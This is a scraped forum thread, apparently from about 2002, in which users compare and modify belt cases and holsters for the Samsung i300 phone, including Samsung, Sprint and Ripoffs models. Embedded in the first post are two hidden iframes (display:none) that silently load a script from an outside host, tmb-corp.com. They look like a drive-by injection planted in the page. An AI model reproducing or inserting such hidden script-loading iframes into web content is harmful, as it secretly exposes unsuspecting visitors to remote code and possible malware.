+ Reply to Thread
Page 1 of 3 1 2 3 LastLast

Thumbs up Great Leather Case

I found this for sale on e-bay.
    The sellar won't ship it to Canada . Pitty.

Does anyone know where I can find the retailer for them.
    She said it is made by OED. ??????

I couldn't get much more info from her. I think it's a her .

If you arn't bidding they have no time to chat with you !

Mike<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    Attached Thumbnails Attached Thumbnails Great Leather Case-case.jpg  

That's the case made by Samsung which sells it in their Accessory Store for US $24.99, though it's temporarily out-of-stock. It has a flimsy belt clip which easily pops off causing damage or loss. The phone must be removed from the case to use it or the PDA, as the keypad is inaccessible. There's no bottom cut-out for charging. Yada,yada - you get the idea.

Thanks for the info.
    I want a case that looks and acts just like that. Something to leave on my belt , but take the phone out of and replace fast and easily.
    I went through the thread on cases , but can't find one I like.

Any recomendations ????

The person on ebay wanted $41 USD for it.

Nice profit.

Mikol

Cavat emptor - especially on EBay.

I have the Samsung case. I added a riveted pager safety chain, stabilized the pop-off belt clip with SuperGlue, and, lately, cut the flip lid off (see my recent posting) for easy access. Now I'm happier.

Originally posted by mikol
    Thanks for the info.
    I want a case that looks and acts just like that. Something to leave on my belt , but take the phone out of and replace fast and easily.

Any recomendations ????

Nice profit.

Mikol
    Search for my thread on the Sanyo case at Target for $10 (also at Ace Hardware, believe it or not, for $7.50).

I removed....

the plastic casing altogether from the cheap case that came with the unit...

Now my phone attaches to the plastic piece that was inserted there (phone clips securely to the carrier) and then riveted a nub to the back of that to carry on belt...

Very light, very unobtrusive and slides on and off belt easily...

OMT

RIP OFF ALERT

The posted case is available from Samsung for 24.99 plus an additional 20% off. Also hasn't gotten good reviews.

Sprint $15 case, modified

The excellent velcro-closure Sprint case is $15. It uses a very strong leather belt loop, attached with two large snaps.

I cut a small notch from the bottom to make room for the earbud plug - which is the only way I use the phone function (Voice Command plus "button" means I rarely have to touch the phone itself).

To reduce fumbling, I cut away the cross-piece at the top of the small LCD window, thus allowing very easy one-hand access to the unit. The antenna is up and forward, so the LCD is outboard. The large velcro closure holds the flap down, and the unit is very securely in place. When I pull the phone up, the earbud wire goes with it, through the bottom - but can be easily flicked off with a finger. It's better than you might think.

I then removed the forward snap. This lets the whole thing swivel so I can see caller ID in the small LCD.
    The older I get, the better I was...

I too have the Sprint Leather Glove for the i300. what really needs to be made is a holster such as the one for the tp1100 or the n200. the case from sprint has good protection for the phone but no swivel lock. ive been experimenting with different cases while at work but none seem to fit the bill yet. until i find a hard plastic case for the i300 then im sticking with sprints case.

-jet

I've tried both...still want better option...

I used the clip on case (top post) and regardless of eas-of-use issues, the cheap "leather" wore within a few days - actually turned white -- and was not even close to the durability I expected...plus it was expensive...

I've gone back the side mounted velcro holster and made a few of the modifications mentioned...

Question: h_eisenson - have you noticed the cheap snap covers inside the case do not prevent the snaps from rubbing on the screen? I noticed this immediatley, causing me to rotate and flop the phone so the screen faces out, with antenna to the rear (Not my preferred arrangement, but seems to protect the screen better.)
    I love my wife and my I300...don't make me choose.

Snaps on leather case

On my case, the inner portion of the snaps are covered by a fabric circle, attached with adhesive. Works fine.

I still like this case a lot, and have no plans to search for others. It's protective, swivels (one snap), lets me see the caller ID, etc. I cut an aperture to let me access the volume controls and earphone jack. Also, insertion/removal is quick.
    The older I get, the better I was...

Same here..but...

I too like that case, but on mine, the fabric circles were not enough to protect the screen... (Thanks goodness I had a screen protector on my phone or it would have been permananetly scratched.) I'll probably glue new covers on mine so I can turn the phone back around.
    I love my wife and my I300...don't make me choose.

holster for i300

found a holster for the i300 here are a couple of pics using a cheap webcam. it does have clip on the back and the clip does swival. if you want info on how to get one please contact me via e-mail

fevin@satx.rr.com

and no i am not selling them myself

fevin

for some reason i can not attach a file or insert a pic. so e-mail me and i will send pic

Still having problems posting pics, send me e-mail if you want to see them

Attached Images  
    Last edited by fevin; 01-25-2002 at 08:23 PM.

Administrator

Arrow

in regards to the pics, please try to post again... interested in seeing these....

RJS
    Originally posted by mikol
    Thanks for the info.

Any recomendations ????

Nice profit.

Mikol

The case I like is nothing fancy but it works great. It's made by the Reline company and the cases are called "ripoffs" Don't be fooled by the name. It's a quality case and they're not that expensive. They're not very stylish either so take a look before you buy. It's just a black nylon case with a metal clip on the back. You can take a look at them here http://www.ripoffs.com/datasheets/co84/co84.html

For the I300, go with the ripoffs model CO-84 series. That's the case I use and it works great. It comes in and out of the case rather easily and it stays snug on your belt line. Unfortunately there are no cut-outs for the buttons or charging port on the one I have but there is a sub-model of the C0-84 that does have a charger cutout (C0-84 MEC.) It looks like there is also one with mesh sides allowing access to the side buttons. I haven't tested any of these other models.

You can find them on the internet for under $20

This is where I got mine http://www.fastmed.com/Ripoffs/Phone.htm

I am not associated with any companies mentioned above so don't ask me details about their respective operations.

I hope this helps.

RJS

Administrator

Arrow

anyone who has clicked on the banner up top (all of you beter be! ) they have a leather case for the i300. is this the case sprint was selling??? curious..

they also have some decent prices...

good job fikse!

I was curious as well and it looks just like the one on the Samsung site. Didn't check the Sprint site though.

chk
    I'm curious about these cases as well....especially this one-

http://store.yahoo.com/1800mobiles/samletpor.html

It looks like a nicer version of the one that came with the phone. Has anyone seen this?

CHK

chk
    Whoops! After checking the site again I noticed the product I mentioned in the above post is just like the one on the Samsung site....oh well....I'll probably just break down and buy the E&B case....

Smile cases

I purchased the case that was manufactured by Samsung. Gotta love the faux alligator skin. But considering what is available at this time, for $20 it is not a bad deal.